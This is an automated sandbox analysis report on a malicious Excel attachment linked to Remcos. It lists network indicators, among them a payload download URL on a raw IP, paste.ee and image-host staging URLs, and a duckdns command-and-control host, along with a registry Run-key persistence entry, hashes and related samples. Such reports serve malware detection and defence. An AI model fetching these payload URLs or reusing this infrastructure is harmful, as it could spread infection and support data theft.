            http://z2.ink/nLNGyXFE430000.0.dr, ~DF413A5A3890D32AE4.TMP.0.drfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://uploaddeimagens.com.br/images/00powershell.exe, 0000000C.00000002.477785176.0000000005013000.00000004.00000020.00020000.00000000.sdmptrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
            • URL Reputation: phishing
            		unknown
            https://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.466787853.00000000028AA000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://analytics.paste.ee;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdnjs.cloudflare.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://cdnjs.cloudflare.com;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net0Dwscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://z2.ink/z2.ink.url.4.drfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.549227483.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.466787853.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465713352.0000000002771000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://secure.comodo.com/CPS0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://secure.gravatar.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://themes.googleusercontent.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.entrust.net/2048ca.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpwEQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            54.241.153.192
            		z2.inkUnited States
            		16509AMAZON-02UStrue
            188.114.97.3
            		paste.eeEuropean Union
            		13335CLOUDFLARENETUStrue
            178.237.33.50
            		geoplugin.netNetherlands
            		8455ATOM86-ASATOM86NLfalse
            198.46.178.154
            		unknownUnited States
            		36352AS-COLOCROSSINGUStrue
            194.187.251.115
            		sembe.duckdns.orgUnited Kingdom
            		9009M247GBtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447833
            Start date and time:2024-05-27 08:59:12 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 12m 7s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:22
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Ref19920830281982938RT.xls
            Detection:MAL
            Classification:mal100.spre.troj.spyw.expl.evad.winXLS@19/35@11/5
            EGA Information:
            • Successful, ratio: 40%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 71
            • Number of non-executed functions: 189
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Override analysis time to 240s for powershell

            Warnings

            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3300 because there are no executed function
            • Execution Graph export aborted for target powershell.exe, PID 3508 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 3856 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            00:00:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbs
            00:01:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbs
            03:00:37API Interceptor38x Sleep call for process: EQNEDT32.EXE modified
            03:00:39API Interceptor87x Sleep call for process: wscript.exe modified
            03:00:42API Interceptor291x Sleep call for process: powershell.exe modified
            03:00:58API Interceptor9536457x Sleep call for process: RegAsm.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54.241.153.192swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/n7QN
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/
            188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
            • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
            http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
            • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
            http://twomancake.comGet hashmaliciousUnknownBrowse
            • twomancake.com/
            BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
            • fleur-de-lis.sbs/jhgfd
            Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
            • qr-in.com/YXcuqXy
            LHER000698175.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/JeYCrvM
            PO 4500025813.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/RtWEZGi
            SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
            • rocheholding.top/evie3/five/fre.php
            WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
            • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
            http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
            • hjkie5.pages.dev/
            178.237.33.50LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • geoplugin.net/json.gp
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            #Inv_PI_{number_12}_pdf.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            sembe.duckdns.orgLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
            • 194.187.251.115
            20240506_120821.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
            • 194.187.251.115
            20240506_120821.batGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
            • 194.187.251.115
            Fatura #U00f6demesi VR046190.docx.docGet hashmaliciousDBatLoaderBrowse
            • 194.187.251.115
            fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
            • 194.187.251.115
            nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            Ziraat Bankas#U0131 Swift Mesaji2.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
            • 194.187.251.115
            z2.inkswift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            paste.eeLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            update.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            file.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            windows.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            INVOICE.jsGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
            • 188.114.96.3
            Receipt #761.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Drwg.xlsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            geoplugin.netLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • 178.237.33.50
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            #Inv_PI_{number_12}_pdf.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSPO_27052024.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            #U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
            • 172.64.41.3
            TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
            • 188.114.96.3
            https://verify-signinoutlexchangeadmin.com/MBill@microsoft.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
            • 188.114.97.3
            https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 104.16.242.248
            https://brownpluss.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            setup_CodecInstaller_full.exeGet hashmaliciousEICARBrowse
            • 172.67.130.88
            MV XH DOLPHINPDF.exeGet hashmaliciousLokibotBrowse
            • 104.21.85.101
            WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
            • 172.67.25.118
            AMAZON-02US#U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
            • 18.143.129.199
            https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 18.156.141.44
            lrZL6K5Idl.exeGet hashmaliciousNjratBrowse
            • 108.132.8.18
            https://fix-to-all-issues-review-verification-form-aa-submit-wheat.vercel.app/Get hashmaliciousHTMLPhisherBrowse
            • 76.76.21.9
            https://sweet-moonbeam-28ccf4.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
            • 52.30.24.58
            https://origines-decoration.com/Get hashmaliciousUnknownBrowse
            • 18.159.147.43
            https://kruekanlogin.gitbook.io/Get hashmaliciousUnknownBrowse
            • 76.223.111.18
            https://fix-to-all-issues-review-verifications-o-form-a-submit-a.vercel.app/Get hashmaliciousHTMLPhisherBrowse
            • 76.76.21.22
            https://fbrestriction.wixsite.com/facebookGet hashmaliciousUnknownBrowse
            • 108.156.60.112
            https://www.allianceswap.finance/Get hashmaliciousUnknownBrowse
            • 52.208.173.59
            AS-COLOCROSSINGUShttps://www.brownfieldagnews.com/news/Get hashmaliciousUnknownBrowse
            • 23.95.182.29
            https://springs-citation-house-congressional.trycloudflare.com/win/print.exeGet hashmaliciousXmrigBrowse
            • 107.172.34.27
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 198.46.178.154
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 198.12.107.122
            Offer Document 23.lnkGet hashmaliciousFormBookBrowse
            • 198.46.174.157
            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 192.3.27.169
            wz5CHr5oLF.elfGet hashmaliciousMiraiBrowse
            • 107.173.61.88
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            ATOM86-ASATOM86NLhttps://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 178.237.32.248
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • 178.237.33.50
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            05af1f5ca1b87cc9cc9b25185115607d37SD8SH18I.docmGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 188.114.97.3
            1080.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Drwg.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Pepsico RFQ_P1005712.xlsGet hashmaliciousGuLoaderBrowse
            • 188.114.97.3
            ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            7dcce5b76c8b17472d024758970a406bLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            ArOuryf0GL.rtfGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            948209184.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3

            Dropped Files

            No context

            Created / dropped Files

            C:\ProgramData\incontrovertido.vbs

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Non-ISO extended-ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):204105
            Entropy (8bit):5.165709687166053
            Encrypted:false
            SSDEEP:3072:A1yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8h0:A191lF1rflGsZcfu
            MD5:9D7684F978EBD77E6A3EA7EF1330B946
            SHA1:3FA2D2963CBF47FFD5F7F5A9B4576F34ED42E552
            SHA-256:6C96E976DC47E0C99B77814E560E0DC63161C463C75FA15B7A7CA83C11720E82
            SHA-512:496EC0BA2EEA98355F18201E9021748AB32DE7E5996C54D9C5C4AFBE34B1C7CD2F50E05EC50F2C552E04E121BEDFFED6234ED111C25FC7A2454B33A1D6C55D6F
            Malicious:false
            Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage

            C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
            Encrypted:false
            SSDEEP:6:I3DPczkx9vxggLRVefUIxnCtDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKkRQPg3vYg3J/
            MD5:9BAA85916F08F558262C035291B86B95
            SHA1:437B9E6B79B0ED9F29284622B30A3D00C2F328D7
            SHA-256:1274B9503A3133A301FBE723FCCEA8C66BB38C31DE992ADBC0B87EA2AA1ABC92
            SHA-512:14932C5BA635ADE73AAB052CA8306A0B60CBBB3A25431A9A2FBD804CF408EFCC035A3EEBE8DBEE3F4DFB652927CB6AD1AD2D58AAB8A7E1D24824DD0459F96967
            Malicious:false
            Preview:......M.eFy...z.c>.IlM..=./:.(S,...X.F...Fa.q..................................uL..8_..!........;.i.{..H.~..-........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):4760
            Entropy (8bit):4.834060479684549
            Encrypted:false
            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
            MD5:838C1F472806CF4BA2A9EC49C27C2847
            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
            Malicious:false
            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Preview:@...e...........................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\iuC2i[1].txt

            Download File
            Process:C:\Windows\SysWOW64\wscript.exe
            File Type:ASCII text, with very long lines (11197), with CRLF line terminators
            Category:dropped
            Size (bytes):13274
            Entropy (8bit):4.566436252538346
            Encrypted:false
            SSDEEP:384:o7dvuFVAt959rO6YCATd+milG0Od3Ne/pH+H0RvYVpPgRqVNcbREUJ+K2jhwZWhP:tVSXFO6+TgllGvd3Ne/gUCVN29EUJ+Kq
            MD5:A79C811B3E190B13B99F0E01B5657292
            SHA1:814F608A80ADDEEF1B4DB664CEC0E98F5913C53F
            SHA-256:C6A02F20BF89DDBD0FCD09BA2FBDE3F384C17CB33FA7EB03C57FEA6C11DF6653
